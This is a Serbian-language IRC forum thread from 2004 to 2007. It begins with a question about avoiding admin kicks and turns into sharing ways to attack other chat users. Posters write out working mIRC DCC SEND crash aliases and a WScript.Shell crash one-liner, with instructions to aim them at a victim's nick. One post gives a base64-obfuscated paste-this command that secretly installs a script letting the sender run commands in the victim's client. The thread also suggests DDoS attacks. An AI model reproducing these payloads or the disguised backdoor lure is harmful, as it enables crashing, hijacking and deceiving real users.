[ Climaxx @ 10.12.2004. 17:40 ] @
Hey people! Načuo sam da postoji programčić koji kada si na chatu, ne da da te admin izbaci sa chata. Da li postoji takvo što ili ne? Unaprijed hvala! Stvarno je zakon ovaj site!
[ BytEfLUSh @ 10.12.2004. 19:36 ] @
Ne postoji. Admin (IRCOp) te uvek može izbaciti, na ovaj ili onaj način. ChanOp (@ u kanalu) te takođe uvek može izbaciti, mada - ko zna... Možda stvarno postoji neki IRC server sa propustom, ali za tako nešto nikad nisam čuo.
[ Climaxx @ 10.12.2004. 20:11 ] @
Ja isto čisto sumljam da postoji nekakav takav programčić,ali nešto sam načuo da ima, pa se interesiram. Okay! Hvala ti!
[ LaMpiR @ 10.12.2004. 23:49 ] @
Citat:
Climaxx: Hey people! Načuo sam da postoji programčić koji kada si na chatu, ne da da te admin izbaci sa chata. Da li postoji takvo što ili ne? Unaprijed hvala! Stvarno je zakon ovaj site!


Nema sigurno, nemoj se nadati :)
[ neca @ 13.12.2004. 19:02 ] @
Postoji exploit u mircu do verzije 6.12 mislim,
ja sam na linuxu imao xlack scriptu i uz pomoc nje izbacivao narod ;)

ako ti se program gasi sam od sebe(a u pitanju je ova verzija mirca), promeni irc client ;)
[ LaMpiR @ 13.12.2004. 20:07 ] @
Citat:
neca: Postoji exploit u mircu do verzije 6.12 mislim,
ja sam na linuxu imao xlack scriptu i uz pomoc nje izbacivao narod ;)

ako ti se program gasi sam od sebe(a u pitanju je ova verzija mirca), promeni irc client ;)


Njemu treba program da ga admin ne moze izbaciti. Kad ti admin pukne gline ili zline to nije exploit. Drugo je exploit od 6.01 do 6.12 verzije mislim da radi
[ neca @ 13.12.2004. 22:17 ] @
Joj ;) ja sam tek sad provalio sta je bilo pitanje ;)
mislio sam da li postoji programcic kojim ce on da izbacuje, iako nije admin ;)) pa mi je prvo taj exploit prosao kroz glavu ;)

Sorry za offtopic odgovor.
[ Stefano @ 14.12.2004. 10:20 ] @
Ja sam video neku drugu stvar.
Lik na chatu imao "nesto"(ne znam koji program ili skriptu)i kada chanserv njega banuje/kickuje on automatski sebe banuje a ne njega!
zna li neko kako se to radi
[ kUdtiHaEX @ 19.12.2004. 19:57 ] @
A to je onaj mutu ban protection :))))) u principu - prodavanje muda za bubrege...
[ Limp_Bizkit @ 22.12.2004. 15:07 ] @
radi se o DCC exploitu za mIRC, ali rjetko ko josh koristi te verzije,

13/10/2003 - mIRC v6.12

Changes:
1.Fixed dcc related gpf bug.

znaci sve od te i novije verzije nemaju taj bug :) ,

/crash
/crash /crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)
/sir /kill {
echo -a * pwning $$1
raw -q privmsg $$1 : $+ $chr(2) $+ DCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a" $longip($ip) $r(1024,10000) $+ $chr(1)

to ti je exploit, koji ide u Alias :) , i komandom /crash nick osobi ce se ugasiti mIRC i dobice error poruku, osim ako je DCC u te osobe skroz iskljucen, tako bi neshto bilo ako me sjecanje josh sluzi :))
[ molestor @ 22.12.2004. 22:05 ] @
* Invalid format: $+ (line 25, aliases.ini)

pa evo stavio sam ono u alias i probao /crash i eto gore što mi izbaci irc
[ bega @ 25.12.2004. 11:13 ] @
* Invalid format: $+ (line 15, aliases.ini) meni ovo izbaci...u cemu je razlika sad line 25 i line 15
[ LaMpiR @ 25.12.2004. 22:12 ] @
http://deztr0jah.distored.net
ima fino adon za to...
[ Kimi Raikkonen @ 26.12.2004. 15:17 ] @
/raw PRIVMSG $snicks :DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0 0 0
[ Kimi Raikkonen @ 26.12.2004. 15:25 ] @
umesto $snicks ukucajte nick zrtve koju zelite izbaciti :D
[ icestorm @ 18.07.2006. 14:34 ] @
neca aj pliz reci mi kako da banam drugoga na chatu premda nisam admin
[ LaMpiR @ 18.07.2006. 15:00 ] @
Citat:
icestorm: neca aj pliz reci mi kako da banam drugoga na chatu premda nisam admin

Pa naravno da nece jer je exploit jako star i skoro pa bas niko ne koristi te verzije mIRC-a.
NIKAKO!!! NIKAKO!!! NIKAKO!!!
NE MOZES BANOVATI USERA SA IRC SERVERA AKO NISI ADMIN NA TOM SERVERU!!! MOZES GA BANOVATI SA KANALA ALI I TO ZAVISI DA LI IMAS NEKI STATUS NA KANALU I DA LI NICK KOJEG ZELIS BANOVATI IMA JACI STATUS OD TEBE I NARAVNO ZAVISI OD ZASTITA KANALA!!!
[ Serbian ManiaC @ 01.08.2006. 07:38 ] @
Ako se bash oces lejmerisati imas http://www.deztr0jah.org/addons.php [kao sto je navedeno gore radi do ver. 6.12 :DDD]
Na dnu ti je DCC Exploit :))))))))))))))))))))))))
E btw: ovo je starija tema :D
[ LaMpiR @ 01.08.2006. 10:02 ] @
LOL
Pa ko jos koristi 6.12 verziju...
[ Demoritus @ 04.08.2006. 14:33 ] @
E, čime se vi bavite.. Protiv viših se ne može =)
[ Ironije @ 18.08.2006. 01:05 ] @
Citat:
Demoritus: E, čime se vi bavite.. Protiv viših se ne može =)

Pa sad bash ... Izbacish se 20 Jevra, zakupish Virtual server na 100 MBps, krknesh neki ddos pa se koljesh sa "vishima" :)

Citat:
LaMpiR: LOL
Pa ko jos koristi 6.12 verziju...

Postoje skripte koje su zasnovane na toj ver i koje u svom paketu sadrze tu verziju mIRC-a

Citat:
Kimi Raikkonen: /raw PRIVMSG $snicks :DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0 0 0

Na Krsti nece uspeti iako nadjesh nekoga sa verzijom do 6.12, kill-ovace te server .
[ bitanga-ns @ 25.09.2006. 16:45 ] @
eo jedan exploit koji rushi sve i jedan mirc ":)


ko zna da napravi code da se poshalje ono u fazonu kao onaj crash neka sastavi code


//comopen crash WScript.Shell | var %leak = $comcall(crash,1,1)


znchi radi na sve verzije mIRCa samo treba dobar code da se sastavi da moze da se shalje



ovaj bug jos nisu sredili ni na poslednjoj verziji mirca



eto pa ko zna nek pravi :)))

[ DJ0RDJ0 @ 26.03.2007. 11:09 ] @
xexxexex ja sam zarazio neke glupane koje imaju status na neke kanale evo objasnja
nacerajte nekoga da vam kopira ovo
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc

kad vam kopira
lijepo idete na private sa njim i kucate
neke komande
INS quit ode sa mirca
INS join #kanal ubaci ga na kanal
INS join #2,000 izbaci ga sa kanala
/msg zrtva ins msg #kanal text pricas sa njegowim nickom
INS kick #kanal iime za kick

on ne moze da vidi ove komade zasticuje vas INS
NEKIDRUGI PUT CU OSTAVIT JOS KOJU KOMANDU ZA OP I TAKO

OVO NE RADI na najjnoviju verziju

nadam se da sam nekom pomogo :)))
ako uspije da nadje ovo u mirc svaka mu chast zabijeno je nedje u script editor
[ Spavac_na_Chatu @ 26.03.2007. 16:19 ] @
Postoji Expoit i za 6.14
Adon koji sprecava izacivanje sa servera od strane amina ne postoji.
[ ColdKeyboard @ 26.03.2007. 22:29 ] @
Citat:
DJ0RDJ0: //write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc


Kucaj //echo $encode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m)
pa ces ustvari vidjeti da je to addon koji ce ustvari kada korisnik ukuca taj kod napraviti sebi mali
fajl i svaka poruka koja pocinje sa ins ce biti tretirana kao komanda a ne kao poruka korisniku...

Veoma Lame fazon jer korisnik treba da bude glup i lakovjeran da ukuca sta mu neko da ali
opet u svoje vreme smo ja i drugari navatali dosta bibaca koji su to ukucali...


Btw /join #200,7 bi trebao da izbaci korisnika sa svih soba u kojima se trenutno nalazi...
nesto poput /partall

Pozdrav,
Sale